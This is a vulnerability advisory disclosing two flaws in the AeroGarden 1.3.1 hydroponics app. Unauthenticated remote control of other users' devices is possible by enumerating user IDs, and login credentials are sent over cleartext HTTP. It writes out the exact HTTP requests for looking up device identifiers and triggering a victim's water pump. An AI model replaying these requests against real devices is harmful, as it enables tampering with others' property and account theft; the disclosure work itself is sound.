AeroGarden Version 1.3.1 - Multiple Vulnerabilities
AeroGrow International is a company that produces consumer hydroponic growing
hardware for plants (e.g., herbs, vegetables, and flowers). The hardware product can be
controlled with a mobile application for specific models of their hydroponic growing kits.
The project’s official website is http://www.aerogarden.com. The latest version of the
mobile application is 1.3.1.
Both identified vulnerabilities would be detrimental to AeroGarden users; an attacker could cause the devices to inflict damage to plant life or an attacker could capture traffic to access users’ account information.
Medium and High
Incorrect Access Controls: Implement proper access controls for user actions throughout the application.
Insecure Network Transmission: Enforce the use of secure channels for data transmission.
Jason Gay, Security Associate, Bishop Fox - [email protected]
- 02/20/2019: Initial discovery
- 03/21/2019: First attempt to contact vendor
- 04/17/2019: First contact with vendor
- 07/30/2019: Public Disclosure
Incorrect Access Controls
This version of the AeroGarden application is affected by incorrect access controls. Any user can request information about other users’ Wi-Fi-enabled AeroGarden hardware products, and then use this information to change settings (such as water pump run time, light settings, and vacation mode settings). The vulnerability can be exploited by any remote user without authentication.
|N/A||Medium||Incorrect Access Control||Remote|
- CVSS Base Score: 5.3
- CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
By observing the communication between the mobile application and the Amazon EC2 back end, the testing team revealed that the requests to execute commands on the AeroGarden hardware only required the MAC address (
airGuid) of the hardware and the numerical user ID (
userID) associated with that hardware. The testing team obtained this information by issuing the following request:
POST /api/Custom/QueryUserDevice HTTP/1.1 Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080 Content-Type: application/x-www-form-urlencoded Connection: close Accept: */* User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00) Accept-Language: en-US;q=1 Content-Length: 12 Accept-Encoding: gzip, deflate userID=[REDACTED]
The response returned the following information:
By iterating through the possible 5-digit combos for the userID during testing, the team could retrieve the MAC address (
airGuid) of various units not under their control. Only these two pieces of information were necessary to issue commands to the hardware.
With this information, an attacker could issue the following command to turn on the water pump for one minute:
POST /api/Custom/UpdateDeviceConfig HTTP/1.1 Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080 Content-Type: application/x-www-form-urlencoded Connection: close Accept: */* User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00) Accept-Language: en-US;q=1 Content-Length: 118 Accept-Encoding: gzip, deflate airGuid=[REDACTED]&chooseGarden=0&plantConfig=%7B%0A%20%20%22pumpTest%22%20%3A%201%0A%7D&userID=[REDACTED]
It was confirmed that the unit then ran its pump for one minute. By reviewing different options within the mobile application, different commands could also be issued to alter the light cycle, set vacation mode, or return the devices to their default settings. An attacker could make the motor run until damaged or change options and timing to damage plant life in the system.
No authentication was required for exploitation.
Insecure Network Transmission
The AeroGarden application transmits not only request for command execution in cleartext but also login credentials for the user's account.
- CVSS Base Score: 9.1
- CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
As shown with the Incorrect Access Control issue in this application, network communication between the mobile application and the Amazon EC2 instance occurs over insecure HTTP channels. During testing, insecure transmission of login information from the application was observed, as shown below:
POST /api/Admin/Login HTTP/1.1 Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080 Content-Type: application/x-www-form-urlencoded Connection: close Accept: */* User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00) Accept-Language: en-US;q=1 Content-Length: 61 Accept-Encoding: gzip, deflate mail=[REDACTED]&userPwd=[REDACTED]
If an attacker were able to capture this traffic, they could access a user’s account on the AeroGarden website, where they could access personal information (such as address and payment information), depending on whether the user has saved this information to the site or not.
Subscribe to Bishop Fox's Security Blog
Be first to learn about latest tools, advisories, and findings.
Thank You! You have been subscribed.